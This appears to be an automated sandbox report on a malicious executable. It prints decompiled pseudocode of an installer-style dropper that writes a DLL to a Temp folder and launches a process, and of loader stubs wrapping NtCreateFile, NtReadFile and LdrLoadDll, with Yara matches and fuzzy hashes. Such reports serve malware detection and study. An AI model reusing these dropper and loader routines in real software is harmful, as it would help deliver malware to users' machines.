                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                  • Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
                                                  • Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
                                                  • Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}




                                                  0x00404e0f
                                                  0x00404e34
                                                  0x00404e54
                                                  0x00404e57
                                                  0x00404e5a
                                                  0x00404e71
                                                  0x00404e77
                                                  0x00404e7e
                                                  0x00404e85
                                                  0x00404e8c
                                                  0x00404e91
                                                  0x00404e97
                                                  0x00000000
                                                  0x00404ea7
                                                  0x00404e41
                                                  0x00404e94
                                                  0x00404e94
                                                  0x00000000
                                                  0x00404e94
                                                  0x00404e4d
                                                  0x00404e4f
                                                  0x00000000
                                                  0x00404e4f
                                                  0x00404e15
                                                  0x00000000
                                                  0x00000000
                                                  0x00404e1c
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404E39
                                                  • CallWindowProcA.USER32 ref: 00404EA7
                                                    • Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                  • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                  • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                  • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10002070, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • property defined, but unable to get value, xrefs: 100020EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AtomNameProp
                                                  • String ID: property defined, but unable to get value
                                                  • API String ID: 3378439024-2444961611
                                                  • Opcode ID: 2f77111288d39f23c46db1507c7fa4daf968883409d61cea7d59ead322a0f20c
                                                  • Instruction ID: 3583f0d05ab507045aaf371a3a66bc946002833c4f8e94d564fd48f644b7d2fe
                                                  • Opcode Fuzzy Hash: 2f77111288d39f23c46db1507c7fa4daf968883409d61cea7d59ead322a0f20c
                                                  • Instruction Fuzzy Hash: D811ECB4904319DBDB00EF99D5846AEBBF4FF48350F00882AFC5597350D7759994CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                  0x004024f1
                                                  0x004024f1
                                                  0x004024f4
                                                  0x0040250f
                                                  0x004024f6
                                                  0x004024f8
                                                  0x004024fd
                                                  0x00402504
                                                  0x00402516
                                                  0x0040268f
                                                  0x0040268f
                                                  0x0040251c
                                                  0x0040252e
                                                  0x004015a6
                                                  0x004015a8
                                                  0x00000000
                                                  0x004015ae
                                                  0x004015a8
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll, xrefs: 004024FD, 00402522
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileWritelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
                                                  • API String ID: 427699356-3798551589
                                                  • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                  • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                  • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                  • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                  0x00405430
                                                  0x0040544c
                                                  0x00405454
                                                  0x00405459
                                                  0x00000000
                                                  0x0040545f
                                                  0x00405463

                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                  • CloseHandle.KERNEL32(?), ref: 00405459
                                                  Strings
                                                  • Error launching installer, xrefs: 0040543A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                  • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                  • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                  • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}







                                                  0x00403586
                                                  0x0040358e
                                                  0x00403595
                                                  0x00403598
                                                  0x00403598
                                                  0x0040359a
                                                  0x0040359f
                                                  0x004035a6
                                                  0x004035ac
                                                  0x004035b0
                                                  0x004035b1
                                                  0x004035b9

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                  • GlobalFree.KERNEL32 ref: 004035A6
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3936084776
                                                  • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                  • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                  • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                  • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                  0x00405702
                                                  0x0040570c
                                                  0x0040570e
                                                  0x00405715
                                                  0x0040571d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040571d
                                                  0x0040571f
                                                  0x00405724

                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00405707
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe,80000000,00000003), ref: 00405715
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3125694417
                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                  0x0040581f
                                                  0x00405821
                                                  0x00405849
                                                  0x0040582e
                                                  0x00405833
                                                  0x0040583e
                                                  0x00000000
                                                  0x0040585b
                                                  0x00405847
                                                  0x00405847
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: nowy przyk#U0142adowy katalog.exe PID: 6596 Parent PID: 6524 nowy przyk#U0142adowy katalog.exeCOMMON

                                                  Executed Functions

                                                  Function 0041867E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 19%
                                                  			E0041867E(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				asm("adc al, 0x55");
				_t13 = _a4;
				_t31 = _a4 + 0xc48;
				E004191D0(_t29, _t13, _t31,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t31))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t30, _t33); // executed
				return _t18;
			}








                                                  0x0041867f
                                                  0x00418683
                                                  0x0041868f
                                                  0x00418697
                                                  0x0041869c
                                                  0x004186c5
                                                  0x004186c9

                                                  APIs
                                                  • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:A
                                                  • API String ID: 2738559852-2859176346
                                                  • Opcode ID: 5f553616136bcfd002f51044b5940ec2dd8b9f6e539dd67c070b982bdc6d6b6d
                                                  • Instruction ID: 75d8bc83ae80fe0485e2f6667b675e81cff7515ff28dee8b552c5e372aa23c08
                                                  • Opcode Fuzzy Hash: 5f553616136bcfd002f51044b5940ec2dd8b9f6e539dd67c070b982bdc6d6b6d
                                                  • Instruction Fuzzy Hash: 85F0F4B2200108ABCB08DF89DC84EEB77A9EF8C754F058248FE1D97241C630E851CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00418680(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                  0x00418683
                                                  0x0041868f
                                                  0x00418697
                                                  0x0041869c
                                                  0x004186c5
                                                  0x004186c9

                                                  APIs
                                                  • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: A:A
                                                  • API String ID: 2738559852-2859176346
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00409B50(void* __eflags, intOrPtr _a4, signed char _a8, signed int _a1783756873) {
				char* _v8;
				char _v12;
				intOrPtr _v16;
				char _v536;
				signed int _v1957628863;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				signed char _t23;
				intOrPtr _t26;
				intOrPtr* _t27;
				WCHAR* _t28;
				void* _t29;
				void* _t30;
				void* _t31;

				_t23 = _a8;
				_v8 =  &_v536;
				_t16 = E0041AF60( &_v12, 0x104, _t23);
				_t30 = _t29 + 0xc;
				if(_t16 != 0) {
					_t18 = E0041B380(__eflags, _v8);
					_t31 = _t30 + 4;
					__eflags = _t18;
					if(_t18 != 0) {
						_t23 =  &_v12;
						E0041B600(_t23, 0);
						_t31 = _t31 + 8;
					}
					_t19 = E00419710(_v8);
					_v16 = _t19;
					__eflags = _t19;
					if(_t19 == 0) {
						_t26 = _a4;
						_v1957628863 = _v1957628863 | _t23;
						_t27 = _t26 + 1;
						_a1783756873 = _a1783756873 | _t23;
						 *_t27 =  *_t27 + _t23; // executed
						__eflags =  *_t27;
						LdrLoadDll(_t28); // executed
						return _v16;
					}
					return _t19;
				} else {
					return _t16;
				}
			}


















                                                  0x00409b59
                                                  0x00409b6c
                                                  0x00409b6f
                                                  0x00409b74
                                                  0x00409b79
                                                  0x00409b83
                                                  0x00409b88
                                                  0x00409b8b
                                                  0x00409b8d
                                                  0x00409b8f
                                                  0x00409b95
                                                  0x00409b9a
                                                  0x00409b9a
                                                  0x00409ba1
                                                  0x00409ba9
                                                  0x00409bac
                                                  0x00409bae
                                                  0x00409bb0
                                                  0x00409bb2
                                                  0x00409bb8
                                                  0x00409bb9
                                                  0x00409bbf
                                                  0x00409bbf
                                                  0x00409bc2
                                                  0x00000000
                                                  0x00409bc4
                                                  0x00409bca
                                                  0x00409b7e
                                                  0x00409b7e
                                                  0x00409b7e

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004185CD, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 72%
                                                  			E004185CD(signed int __edx, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				signed int _v117;
				long _t23;
				void* _t34;
				void* _t36;

				asm("outsd");
				_t36 = __esi + 1;
				_v117 = _v117 | __edx;
				_t17 = _a4;
				_push(_t36);
				_t5 = _t17 + 0xc40; // 0xc40
				E004191D0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}







                                                  0x004185cd
                                                  0x004185ce
                                                  0x004185cf
                                                  0x004185d3
                                                  0x004185d9
                                                  0x004185df
                                                  0x004185e7
                                                  0x0041861d
                                                  0x00418621

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 0a67e275fad455a823b6bea61b574d82cbc13e5cc1272e150d64dac4ed2129eb
                                                  • Instruction ID: 49515680b58282798ea0772b140264028f67580a444d1368a2ea55559255b12e
                                                  • Opcode Fuzzy Hash: 0a67e275fad455a823b6bea61b574d82cbc13e5cc1272e150d64dac4ed2129eb
                                                  • Instruction Fuzzy Hash: 0801AFB2241108AFCB48CF98DC95EEB77A9AF8C354F158249FA0DD7251C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                  0x004185df
                                                  0x004185e7
                                                  0x0041861d
                                                  0x00418621

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                  Memory Dump Source
